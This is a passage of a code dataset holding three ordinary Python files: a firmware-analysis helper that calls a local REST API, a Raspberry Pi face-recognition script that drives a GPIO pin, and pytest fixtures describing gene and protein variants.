'material': materials})\n json[key] = programs\n return json\n\n\ndef createSoftwareComponents(tree, uid_firmware, db):\n json = {}\n components = [key[0] for key in getSoftwareComponentsSummary(tree)]\n for key in getSoftwareComponentsSummary(tree):\n programs = []\n if checkDB(db, components):\n table = db.table(key)\n for row in table:\n programs.append(getProgramInformations(row))\n else:\n uids = [uid for uid in tree['firmware']['analysis']['software_components']['summary'][key]]\n for uid in uids:\n if uid != uid_firmware:\n uid_tree = get('http://localhost:5000/rest/file_object/' + uid).json()\n programs.append(getProgramInformationsFromJson(uid_tree, uid))\n table = createTable(db, key)\n insertInTable(table, getProgramInformationsFromJson(uid_tree, uid))\n json[key] = programs\n return json\n\n\ndef findIncludedFiles(tree):\n index_filesystems = findFileSystems(tree)\n included_files = []\n for index in index_filesystems:\n for file_sys in enumerate(list(getFileTypeSummary(tree).values())[index]):\n file_system = file_sys[1]\n file_system = get('http://localhost:5000/rest/file_object/' + file_system + '?summary=true').json()\n for file in getIncludedFiles(file_system):\n included_files.append(file)\n\n if len(included_files) == 0:\n for file in getUnpacked(tree):\n included_files.append(file)\n return included_files\n\n\ndef findFileSystems(tree):\n index_filesystems = []\n for i, key in enumerate(list(getFileTypeSummary(tree).keys())):\n if key.count('filesystem/') > 0:\n index_filesystems.append(i)\n return index_filesystems\n\n\ndef createImportantConfigs(whitelist_tree, configs):\n important_configs = []\n for key in whitelist_tree:\n for config in findImportantConfigs(whitelist_tree[key], configs):\n important_configs.append(config)\n return important_configs\n\n\ndef deleteDoubleConfigs(remaining_configs, important_configs):\n for important_config in important_configs:\n for i, remaining_config in enumerate(remaining_configs):\n if remaining_config['name'] == important_config['name']:\n remaining_configs.pop(i)\n return remaining_configs\n","sub_path":"modules/JSON.py","file_name":"JSON.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"403591724","text":"import time\n\nimport cv2\nimport face_recognition as fr\nimport numpy as np\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(18, GPIO.OUT)\n\nvideo_capture = cv2.VideoCapture(-1)\n\nme_image = fr.load_image_file(\"me.jpg\")\nme_face_encoding = fr.face_encodings(me_image)[0]\n\nknown_face_encondings = [me_face_encoding]\nknown_face_names = [\"Me\"]\n\nwhile True: \n ret, frame = video_capture.read()\n frame = cv2.flip(frame, -1) #camera flip\n small_frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)\n rgb_frame = small_frame[:, :, ::-1]\n\n face_locations = fr.face_locations(rgb_frame)\n face_encodings = fr.face_encodings(rgb_frame, face_locations)\n\n for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\n\n matches = fr.compare_faces(known_face_encondings, face_encoding)\n\n name = \"Unknown\"\n\n face_distances = fr.face_distance(known_face_encondings, face_encoding)\n\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n \n cv2.rectangle(frame, (left * 2, top * 2), (right * 2, bottom * 2), (0, 0, 255), 2)\n\n #cv2.rectangle(frame, (left, bottom * 4 -35), (right, bottom), (0, 0, 255), cv2.FILLED)\n \n font = cv2.FONT_HERSHEY_SIMPLEX\n GPIO.output(18, True) \n cv2.putText(frame, name, (left * 2 + 6, bottom * 2 - 6), font, 1.0, (255, 255, 255), 1) \n time.sleep(1)\n GPIO.output(18, False)\n\n cv2.imshow('Webcam_facerecognition', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n GPIO.cleanup(18)\n break\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n","sub_path":"face_recog.py","file_name":"face_recog.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"607285956","text":"\"\"\"Create methods used throughout tests.\"\"\"\nimport asyncio\n\nimport pytest\nfrom ga4gh.vrsatile.pydantic.vrsatile_models import VariationDescriptor\n\nfrom variation.query import QueryHandler\n\n\n@pytest.fixture(scope=\"session\")\ndef event_loop(request):\n \"\"\"Create an instance of the default event loop for each test case.\"\"\"\n loop = asyncio.get_event_loop_policy().new_event_loop()\n yield loop\n loop.close()\n\n\n@pytest.fixture(scope=\"session\")\ndef test_query_handler():\n \"\"\"Build normalize test fixture.\"\"\"\n return QueryHandler()\n\n\n@pytest.fixture(scope=\"session\")\ndef test_cnv_handler(test_query_handler):\n \"\"\"Create test fixture for copy number variation handler\"\"\"\n return test_query_handler.to_copy_number_handler\n\n\n@pytest.fixture(scope=\"session\")\ndef vhl_gene_context():\n \"\"\"Create a VHL gene context.\"\"\"\n return {\n \"id\": \"normalize.gene:VHL\",\n \"type\": \"GeneDescriptor\",\n \"label\": \"VHL\",\n \"gene_id\": \"hgnc:12687\",\n \"xrefs\": [\n \"ncbigene:7428\",\n \"ensembl:ENSG00000134086\"\n ],\n \"alternate_labels\": [\n \"HRCA1\",\n \"VHL1\",\n \"RCA1\",\n \"pVHL\"\n ],\n \"extensions\": [\n {\n \"type\": \"Extension\",\n \"name\": \"symbol_status\",\n \"value\": \"approved\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"approved_name\",\n \"value\": \"von Hippel-Lindau tumor suppressor\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"associated_with\",\n \"value\": [\n \"ucsc:uc003bvc.4\",\n \"pubmed:9671762\",\n \"refseq:NM_000551\",\n \"cosmic:VHL\",\n \"omim:608537\",\n \"vega:OTTHUMG00000128668\",\n \"ccds:CCDS2598\",\n \"ena.embl:L15409\",\n \"iuphar:3204\",\n \"orphanet:120467\",\n \"ccds:CCDS2597\",\n \"uniprot:P40337\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.S-TtMfLdsgZPVRrWEf1-jiZMyTDCt5y1\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"3\",\n \"interval\": {\n \"end\": \"p25.3\",\n \"start\": \"p25.3\",\n \"type\": \"CytobandInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VSL.NV92_npjixjlSl1kkRs9Ld8-LjLwv3sq\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.Zu7h9AggXxhTaGVsy7h_EZSChSZGcmgX\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 10141777},\n \"end\": {\"type\": \"Number\", \"value\": 10153667},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.S-TtMfLdsgZPVRrWEf1-jiZMyTDCt5y1\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"3\",\n \"interval\": {\n \"end\": \"p25.3\",\n \"start\": \"p25.3\",\n \"type\": \"CytobandInterval\"\n }\n },\n {\n \"_id\": \"ga4gh:VSL.NV92_npjixjlSl1kkRs9Ld8-LjLwv3sq\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.Zu7h9AggXxhTaGVsy7h_EZSChSZGcmgX\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 10141777},\n \"end\": {\"type\": \"Number\", \"value\": 10153667},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"name\": \"previous_symbols\",\n \"value\": [\n \"RCA1\"\n ],\n \"type\": \"Extension\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locus_type\",\n \"value\": \"gene with protein product\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_gene_type\",\n \"value\": \"protein-coding\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_biotype\",\n \"value\": \"protein_coding\"\n }\n ]\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_ncbi_seq_loc():\n \"\"\"Create test fixture for BRAF ncbi priority sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.xZU3kL8F6t2ca6WH_26CWKfNW9-owhR4\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 140713327},\n \"end\": {\"type\": \"Number\", \"value\": 140924929},\n \"type\": \"SequenceInterval\"\n }\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_gene_context(braf_ncbi_seq_loc):\n \"\"\"Create BRAF gene context test fixture.\"\"\"\n return {\n \"id\": \"normalize.gene:BRAF\",\n \"type\": \"GeneDescriptor\",\n \"label\": \"BRAF\",\n \"gene_id\": \"hgnc:1097\",\n \"xrefs\": [\n \"ncbigene:673\",\n \"ensembl:ENSG00000157764\"\n ],\n \"alternate_labels\": [\n \"BRAF1\",\n \"RAFB1\",\n \"B-raf\",\n \"B-RAF1\",\n \"NS7\",\n \"BRAF-1\"\n ],\n \"extensions\": [\n {\n \"type\": \"Extension\",\n \"name\": \"symbol_status\",\n \"value\": \"approved\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"approved_name\",\n \"value\": \"B-Raf proto-oncogene, serine/threonine kinase\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"associated_with\",\n \"value\": [\n \"ucsc:uc003vwc.5\",\n \"pubmed:1565476\",\n \"omim:164757\",\n \"vega:OTTHUMG00000157457\",\n \"ccds:CCDS5863\",\n \"iuphar:1943\",\n \"ccds:CCDS87555\",\n \"orphanet:119066\",\n \"refseq:NM_004333\",\n \"ena.embl:M95712\",\n \"pubmed:2284096\",\n \"uniprot:P15056\",\n \"cosmic:BRAF\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.O6yCQ1cnThOrTfK9YUgMlTfM6HTqbrKw\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"7\",\n \"interval\": {\n \"end\": \"q34\",\n \"start\": \"q34\",\n \"type\": \"CytobandInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VSL.amNWL6i7F2nbSZAf2QLTRTujxuDrd0pR\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 140719326},\n \"end\": {\"type\": \"Number\", \"value\": 140924929},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.O6yCQ1cnThOrTfK9YUgMlTfM6HTqbrKw\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"7\",\n \"interval\": {\n \"end\": \"q34\",\n \"start\": \"q34\",\n \"type\": \"CytobandInterval\"\n }\n },\n braf_ncbi_seq_loc\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locus_type\",\n \"value\": \"gene with protein product\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_gene_type\",\n \"value\": \"protein-coding\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_biotype\",\n \"value\": \"protein_coding\"\n }\n ]\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef egfr_context():\n \"\"\"Create EGFR gene context test fixture\"\"\"\n return {\n \"id\": \"normalize.gene:EGFR\",\n \"type\": \"GeneDescriptor\",\n \"label\": \"EGFR\",\n \"gene_id\": \"hgnc:3236\",\n \"xrefs\": [\n \"ncbigene:1956\",\n \"ensembl:ENSG00000146648\"\n ],\n \"alternate_labels\": [\n \"HER1\",\n \"NISBD2\",\n \"ERBB\",\n \"PIG61\",\n \"mENA\",\n \"ERBB1\",\n \"ERRP\"\n ],\n \"extensions\": [\n {\n \"type\": \"Extension\",\n \"name\": \"symbol_status\",\n \"value\": \"approved\"\n },\n {\n \"name\": \"approved_name\",\n \"value\": \"epidermal growth factor receptor\",\n \"type\": \"Extension\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"associated_with\",\n \"value\": [\n \"ccds:CCDS5516\",\n \"ccds:CCDS5514\",\n \"iuphar:1797\",\n \"uniprot:P00533\",\n \"vega:OTTHUMG00000023661\",\n \"ucsc:uc003tqk.4\",\n \"ccds:CCDS5515\",\n \"refseq:NM_005228\",\n \"ccds:CCDS87506\",\n \"ccds:CCDS47587\",\n \"pubmed:1505215\",\n \"cosmic:EGFR\",\n \"ccds:CCDS87507\",\n \"omim:131550\",\n \"orphanet:121311\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.wgFi9e72ZIIJaOfLx5gaOeGrwP_IZoQ2\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"7\",\n \"interval\": {\n \"end\": \"p11.2\",\n \"start\": \"p11.2\",\n \"type\": \"CytobandInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VSL.X7hBAPGdirjTLYdjgxKOmcUxaDOWVvUb\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 55019016},\n \"end\": {\"type\": \"Number\", \"value\": 55211628},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.wgFi9e72ZIIJaOfLx5gaOeGrwP_IZoQ2\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"7\",\n \"interval\": {\n \"end\": \"p11.2\",\n \"start\": \"p11.2\",\n \"type\": \"CytobandInterval\"\n }\n },\n {\n \"_id\": \"ga4gh:VSL.X7hBAPGdirjTLYdjgxKOmcUxaDOWVvUb\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 55019016},\n \"end\": {\"type\": \"Number\", \"value\": 55211628},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"name\": \"previous_symbols\",\n \"value\": [\n \"ERBB\"\n ],\n \"type\": \"Extension\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locus_type\",\n \"value\": \"gene with protein product\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_gene_type\",\n \"value\": \"protein-coding\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_biotype\",\n \"value\": \"protein_coding\"\n }\n ]\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef erbb2_context():\n \"\"\"Create test fixture for ERBB2 Gene Context.\"\"\"\n return {\n \"id\": \"normalize.gene:ERBB2\",\n \"type\": \"GeneDescriptor\",\n \"label\": \"ERBB2\",\n \"gene_id\": \"hgnc:3430\",\n \"xrefs\": [\n \"ncbigene:2064\",\n \"ensembl:ENSG00000141736\"\n ],\n \"alternate_labels\": [\n \"NGL\",\n \"CD340\",\n \"HER2\",\n \"NEU\",\n \"TKR1\",\n \"HER-2\",\n \"HER-2/neu\",\n \"VSCN2\",\n \"MLN 19\",\n \"c-ERB-2\",\n \"c-ERB2\",\n \"MLN-19\",\n \"p185(erbB2)\"\n ],\n \"extensions\": [\n {\n \"type\": \"Extension\",\n \"name\": \"symbol_status\",\n \"value\": \"approved\"\n },\n {\n \"name\": \"approved_name\",\n \"value\": \"erb-b2 receptor tyrosine kinase 2\",\n \"type\": \"Extension\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"associated_with\",\n \"value\": [\n \"ucsc:uc002hso.4\",\n \"ena.embl:X03363\",\n \"ccds:CCDS77017\",\n \"vega:OTTHUMG00000179300\",\n \"ccds:CCDS77016\",\n \"uniprot:P04626\",\n \"refseq:NM_004448\",\n \"ccds:CCDS74052\",\n \"hcdmdb:CD340\",\n \"omim:164870\",\n \"ccds:CCDS32642\",\n \"ccds:CCDS45667\",\n \"cosmic:ERBB2\",\n \"iuphar:2019\",\n \"pubmed:1675005\",\n \"pubmed:2885835\",\n \"pubmed:2903500\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.pS7M3aeNymozN9LKeAwVDEB5H1nt4Kqy\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"17\",\n \"interval\": {\n \"end\": \"q12\",\n \"start\": \"q12\",\n \"type\": \"CytobandInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VSL.vNjrFKHvtcTYoMjyGSIRwNDTFgkr4rCW\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.dLZ15tNO1Ur0IcGjwc3Sdi_0A6Yf4zm7\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 39687913},\n \"end\": {\"type\": \"Number\", \"value\": 39730426},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.pS7M3aeNymozN9LKeAwVDEB5H1nt4Kqy\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"17\",\n \"interval\": {\n \"end\": \"q12\",\n \"start\": \"q12\",\n \"type\": \"CytobandInterval\"\n }\n },\n {\n \"_id\": \"ga4gh:VSL.CB10a-ECqV97KH8BtESJmsh6JA8FW4zr\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.dLZ15tNO1Ur0IcGjwc3Sdi_0A6Yf4zm7\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 39688093},\n \"end\": {\"type\": \"Number\", \"value\": 39728658},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"name\": \"previous_symbols\",\n \"value\": [\n \"NGL\"\n ],\n \"type\": \"Extension\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locus_type\",\n \"value\": \"gene with protein product\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_gene_type\",\n \"value\": \"protein-coding\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_biotype\",\n \"value\": \"protein_coding\"\n }\n ]\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef prpf8_ncbi_seq_loc():\n \"\"\"Create test fixture for PRPF8 ncbi priority sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.REtW8dfZCgDLEvo58qhp-dkN-hHiRtDx\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.dLZ15tNO1Ur0IcGjwc3Sdi_0A6Yf4zm7\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"type\": \"Number\", \"value\": 1650628},\n \"end\": {\"type\": \"Number\", \"value\": 1684867}\n }\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef prpf8_gene_context(prpf8_ncbi_seq_loc):\n \"\"\"Create test fixture for PRPF8 gene context\"\"\"\n return {\n \"id\": \"normalize.gene:PRPF8\",\n \"type\": \"GeneDescriptor\",\n \"label\": \"PRPF8\",\n \"xrefs\": [\n \"ensembl:ENSG00000174231\",\n \"ncbigene:10594\"\n ],\n \"alternate_labels\": [\n \"PRPC8\",\n \"PRP8\",\n \"HPRP8\",\n \"Prp8\",\n \"RP13\",\n \"hPrp8\",\n \"SNRNP220\"\n ],\n \"extensions\": [\n {\n \"type\": \"Extension\",\n \"name\": \"symbol_status\",\n \"value\": \"approved\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"approved_name\",\n \"value\": \"pre-mRNA processing factor 8\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locations\",\n \"value\": [\n {\n \"type\": \"ChromosomeLocation\",\n \"_id\": \"ga4gh:VCL.GJ_KKaBnwZCC9_0vezbSxp_yAwM6R8c4\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"17\",\n \"interval\": {\n \"type\": \"CytobandInterval\",\n \"start\": \"p13.3\",\n \"end\": \"p13.3\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_locations\",\n \"value\": [\n {\n \"sequence_id\": \"ga4gh:SQ.dLZ15tNO1Ur0IcGjwc3Sdi_0A6Yf4zm7\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"type\": \"Number\", \"value\": 1650628},\n \"end\": {\"type\": \"Number\", \"value\": 1684867},\n },\n \"_id\": \"ga4gh:VSL.REtW8dfZCgDLEvo58qhp-dkN-hHiRtDx\",\n \"type\": \"SequenceLocation\"\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.GJ_KKaBnwZCC9_0vezbSxp_yAwM6R8c4\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"17\",\n \"interval\": {\n \"type\": \"CytobandInterval\",\n \"start\": \"p13.3\",\n \"end\": \"p13.3\"\n }\n },\n prpf8_ncbi_seq_loc,\n {\n \"sequence_id\": \"ga4gh:SQ.3Wx-9rRd5d7m3WxtJ_HScX3Bz1MiQWjR\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"type\": \"Number\", \"value\": 80656},\n \"end\": {\"type\": \"Number\", \"value\": 114895}\n },\n \"_id\": \"ga4gh:VSL.5FvYcab11zKZuo57GyafVqW9IykgsjAh\",\n \"type\": \"SequenceLocation\"\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"associated_with\",\n \"value\": [\n \"pubmed:10411133\",\n \"ucsc:uc002fte.3\",\n \"pubmed:11468273\",\n \"orphanet:118066\",\n \"ccds:CCDS11010\",\n \"refseq:NM_006445\",\n \"vega:OTTHUMG00000090553\",\n \"uniprot:Q6P2Q9\",\n \"ena.embl:AB007510\",\n \"omim:607300\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"previous_symbols\",\n \"value\": [\n \"RP13\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locus_type\",\n \"value\": \"gene with protein product\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_gene_type\",\n \"value\": \"protein-coding\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_biotype\",\n \"value\": \"protein_coding\"\n }\n ],\n \"gene_id\": \"hgnc:17340\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_600loc():\n \"\"\"Create test fixture for BRAF 600 location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.2cHIgn7iLKk4x9z3zLkSTTFMV0e48DR4\",\n \"interval\": {\n \"end\": {\"value\": 600, \"type\": \"Number\"},\n \"start\": {\"value\": 599, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.cQvw4UsHHRRlogxbWCB8W-mKD4AraM9y\",\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_v600e(braf_gene_context, braf_600loc):\n \"\"\"Create BRAF V600E protein test fixture.\"\"\"\n params = {\n \"id\": \"normalize.variation:BRAF%20V600E\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.ZDdoQdURgO2Daj2NxLj4pcDnjiiAsfbO\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.ZDdoQdURgO2Daj2NxLj4pcDnjiiAsfbO\",\n \"location\": braf_600loc,\n \"state\": {\n \"sequence\": \"E\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"protein\",\n \"structural_type\": \"SO:0001606\",\n \"vrs_ref_allele_seq\": \"V\",\n \"gene_context\": braf_gene_context\n }\n return VariationDescriptor(**params)\n\n\n@pytest.fixture(scope=\"session\")\ndef vhl_silent(vhl_gene_context):\n \"\"\"Create NP_000542.1:p.Pro61 fixture.\"\"\"\n params = {\n \"id\": \"normalize.variation:NP_000542.1%3Ap.Pro61%3D\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.S1GX6EwJV3exmJAH8MnxS8-S9J4i2Ip_\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.S1GX6EwJV3exmJAH8MnxS8-S9J4i2Ip_\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.zuNGmA02Uq49faqvCIPtwVrF_IJuP4dM\",\n \"interval\": {\n \"end\": {\"value\": 61, \"type\": \"Number\"},\n \"start\": {\"value\": 60, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.z-Oa0pZkJ6GHJHOYM7h5mY_umc0SJzTu\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"P\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"protein\",\n \"structural_type\": \"SO:0001017\",\n \"vrs_ref_allele_seq\": \"P\",\n \"gene_context\": vhl_gene_context\n }\n return VariationDescriptor(**params)\n\n\n@pytest.fixture(scope=\"session\")\ndef protein_insertion(egfr_context):\n \"\"\"Create test fixture for NP protein insertion.\"\"\"\n params = {\n \"id\": \"normalize.variation:NP_005219.2%3Ap.Asp770_Asn771insGlyLeu\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.t_WLqe5efVQlBmdbIBgqIeLRu2rSJDJJ\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.t_WLqe5efVQlBmdbIBgqIeLRu2rSJDJJ\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.DJIP1jlxQIro1oC5re8txtH7N8vAvM7A\",\n \"interval\": {\n \"end\": {\"value\": 770, \"type\": \"Number\"},\n \"start\": {\"value\": 770, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.vyo55F6mA6n2LgN4cagcdRzOuh38V4mE\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"GL\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"protein\",\n \"structural_type\": \"SO:0001605\",\n \"gene_context\": egfr_context\n }\n return VariationDescriptor(**params)\n\n\n@pytest.fixture(scope=\"session\")\ndef protein_deletion_np_range(erbb2_context):\n \"\"\"Create test fixture for protein deletion using NP accession and\n range for deletion.\n \"\"\"\n params = {\n \"id\": \"normalize.variation:NP_004439.2%3Ap.Leu755_Thr759del\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.rFwsfnekdWjwKNmsAw9fZOCGgIvcMnCn\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.rFwsfnekdWjwKNmsAw9fZOCGgIvcMnCn\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.vhpNJ0vsJx3WbnCfwJzxFU-wWyZwvPdL\",\n \"interval\": {\n \"end\": {\"value\": 759, \"type\": \"Number\"},\n \"start\": {\"value\": 754, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.AF1UFydIo02-bMplonKSfxlWY2q6ze3m\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"protein\",\n \"structural_type\": \"SO:0001604\",\n \"vrs_ref_allele_seq\": \"LRENT\",\n \"gene_context\": erbb2_context\n }\n return VariationDescriptor(**params)\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_v600e_genomic_sub():\n \"\"\"Create test fixture for NC_000007.14:g.140753336A>T\"\"\"\n return {\n \"_id\": \"ga4gh:VA.fZiBjQEolbkL0AxjoTZf4SOkFy9J0ebU\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.zga82-TpYiNmBESCfvDvAz9DyvJF98I-\",\n \"interval\": {\n \"end\": {\"value\": 140753336, \"type\": \"Number\"},\n \"start\": {\"value\": 140753335, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"T\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup1_seq_loc():\n \"\"\"Create test fixture containing genomic dup1 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.G_J9WrfooiONRgjbmGPuCBYbBYFQnYOg\",\n 